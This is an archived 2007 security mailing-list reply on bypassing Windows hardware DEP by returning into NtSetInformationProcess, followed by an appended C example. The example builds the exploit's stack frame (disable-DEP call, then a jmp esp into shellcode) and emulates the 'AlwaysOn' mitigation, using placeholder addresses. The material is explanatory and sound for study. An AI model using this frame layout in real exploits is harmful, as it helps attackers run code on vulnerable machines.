Dailydave mailing list archives

Re: The sky's downward trajectory


From: "Rhys Kidd" <rhyskidd () gmail com>
Date: Mon, 19 Feb 2007 13:28:54 +0900

I'd assume that Immunity's method of bypassing hardware-based DEP (i.e. the
NX protect bit in modern CPUs) builds on the work of skape and Skywing in
Uninformed Journal v2, http://uninformed.org/?v=2&a=4&t=sumry.

The attack relies on first returning to the function in ntdll.dll called
NtSetInformationProcess with a parameter that disables hardware DEP on a
per-process basis. As this function is code, the process is allowed to direct
execution flow to it while hardware DEP is still enabled.

"This approach requires the knowledge of three addresses. First, the address
of the mov al, 0x1 / ret equivalent must be known. Fortunately, there are
many occurrences of this type of block, though they may not be as simplistic
as the one described in this document. Second, the address of the start of
the cmp al, 0x1 block inside ntdll!LdrpCheckNXCompatibility must be known.
By depending on two addresses within ntdll, it stands to reason that an
exploit can be more portable than if one were to depend on addresses from
two different DLLs. Finally, the third address is the one that would be the
one that is typically used on targets that didn't have hardware-enforced
DEP, such as a jmp esp or equivalent instruction depending on the
vulnerability in question."

The impact of this method is that an exploit could be modified rather easily
to first disable DEP before attempting to return into its own arbitrary
code.

So what does Microsoft provide to make this more secure?

Firstly, the push by Michael Howard et al. to get ASLR implemented in Vista
beta 2 and above means the addresses within ntdll.dll are going to be
somewhat random, thereby making reliable use of this technique difficult.
NX-bit-based defenses really should be implemented hand-in-hand with some
form of memory randomisation, as was documented by the PaX project.

Secondly, as Dave mentioned, setting "AlwaysOn" in boot.ini should prevent
DEP from being disabled on a per-process basis.

HTH.
Rhys
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
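The frame described in the message above, as an added example that is not part of the original post, of the Uninformed paper, or of any Immunity code: it lays out the 32-bit x86 stack words an exploit places at the overwritten return address so that the vulnerable function returns into ntdll!NtSetInformationProcess with arguments that turn DEP off for the current process, and then returns a second time into a jmp esp that lands on the payload. The three target addresses are parameters, as they would be in a real exploit; the ProcessExecuteFlags class (0x22) and MEM_EXECUTE_OPTION_* values are the ones documented by skape and Skywing. The policy check at the end is a simplified emulation written here to illustrate why "AlwaysOn" blocks the call (it sets the PERMANENT bit); it is an assumption, not kernel code. The sample addresses in self_check() and main() are constructed placeholders. The block builds and runs on any platform because it only computes the frame; it does not perform the call.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* ProcessInformationClass and the execute-option bits from the paper. */
#define PROCESS_EXECUTE_FLAGS        0x22u
#define MEM_EXECUTE_OPTION_DISABLE   0x01u       /* no execute from data pages: DEP on  */
#define MEM_EXECUTE_OPTION_ENABLE    0x02u       /* execute allowed: DEP off            */
#define MEM_EXECUTE_OPTION_PERMANENT 0x08u       /* options frozen (boot.ini AlwaysOn) */
#define NT_CURRENT_PROCESS           0xFFFFFFFFu /* (HANDLE)-1                          */
#define STATUS_SUCCESS               0x00000000u
#define STATUS_ACCESS_DENIED         0xC0000022u

/* Addresses the exploit must know on the target (inputs, not discovered here). */
struct target_addrs {
    uint32_t nt_set_information_process; /* ntdll!NtSetInformationProcess          */
    uint32_t jmp_esp;                    /* any "jmp esp" gadget                    */
    uint32_t dword_equal_to_2;           /* readable dword whose value is 0x2       */
};

#define FRAME_WORDS 6

/* Fills frame[0..5]; frame[0] is the slot the saved return address occupied. */
void build_dep_disable_frame(const struct target_addrs *t, uint32_t frame[FRAME_WORDS])
{
    frame[0] = t->nt_set_information_process; /* popped by the vulnerable function's ret   */
    frame[1] = t->jmp_esp;                    /* NtSetInformationProcess's return address  */
    frame[2] = NT_CURRENT_PROCESS;            /* ProcessHandle                             */
    frame[3] = PROCESS_EXECUTE_FLAGS;         /* ProcessInformationClass                   */
    frame[4] = t->dword_equal_to_2;           /* ProcessInformation -> MEM_EXECUTE_OPTION_ENABLE */
    frame[5] = sizeof(uint32_t);              /* ProcessInformationLength                  */
}

/* NtSetInformationProcess is stdcall with four arguments and returns with
   "ret 0x10", so when the jmp esp gadget runs, esp points just past the
   frame: that is where the shellcode must start. */
size_t shellcode_offset(void) { return FRAME_WORDS * sizeof(uint32_t); }

/* Simplified emulation (assumption, not kernel code): once PERMANENT is set,
   any attempt to change the execute options is refused. */
uint32_t emulate_set_execute_options(uint32_t *current, uint32_t requested)
{
    if ((*current & MEM_EXECUTE_OPTION_PERMANENT) &&
        (requested & ~MEM_EXECUTE_OPTION_PERMANENT) != (*current & ~MEM_EXECUTE_OPTION_PERMANENT))
        return STATUS_ACCESS_DENIED;
    *current = requested | (*current & MEM_EXECUTE_OPTION_PERMANENT);
    return STATUS_SUCCESS;
}

int execution_allowed(uint32_t options) { return (options & MEM_EXECUTE_OPTION_ENABLE) != 0; }

/* Returns 1 when the frame and the policy emulation behave as described. */
int self_check(void)
{
    /* Constructed placeholder addresses, not real ntdll locations. */
    struct target_addrs t = { 0x11111111u, 0x22222222u, 0x33333333u };
    uint32_t frame[FRAME_WORDS];
    uint32_t optin     = MEM_EXECUTE_OPTION_DISABLE;                               /* default: DEP on */
    uint32_t always_on = MEM_EXECUTE_OPTION_DISABLE | MEM_EXECUTE_OPTION_PERMANENT; /* AlwaysOn        */

    build_dep_disable_frame(&t, frame);
    if (frame[0] != 0x11111111u || frame[1] != 0x22222222u) return 0;
    if (frame[2] != NT_CURRENT_PROCESS || frame[3] != PROCESS_EXECUTE_FLAGS) return 0;
    if (frame[4] != 0x33333333u || frame[5] != 4u) return 0;

    /* Without AlwaysOn the request succeeds and the process runs with DEP off. */
    if (emulate_set_execute_options(&optin, MEM_EXECUTE_OPTION_ENABLE) != STATUS_SUCCESS) return 0;
    if (!execution_allowed(optin)) return 0;

    /* With AlwaysOn (PERMANENT set) the identical request is refused. */
    if (emulate_set_execute_options(&always_on, MEM_EXECUTE_OPTION_ENABLE) != STATUS_ACCESS_DENIED) return 0;
    if (execution_allowed(always_on)) return 0;
    return 1;
}

int main(void)
{
    struct target_addrs t = { 0x11111111u, 0x22222222u, 0x33333333u }; /* placeholders */
    uint32_t frame[FRAME_WORDS];
    size_t i;

    build_dep_disable_frame(&t, frame);
    for (i = 0; i < FRAME_WORDS; i++)
        printf("[ret+%2u] 0x%08x\n", (unsigned)(i * 4), frame[i]);
    printf("shellcode starts at ret+%u; self_check=%d\n",
           (unsigned)shellcode_offset(), self_check());
    return 0;
}
```

The dependence on three fixed addresses is the reason the ASLR point in the message bites: with ntdll relocated per boot, frame[0] cannot be hard-coded, and with PERMANENT set by AlwaysOn the call fails even when the addresses are right.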
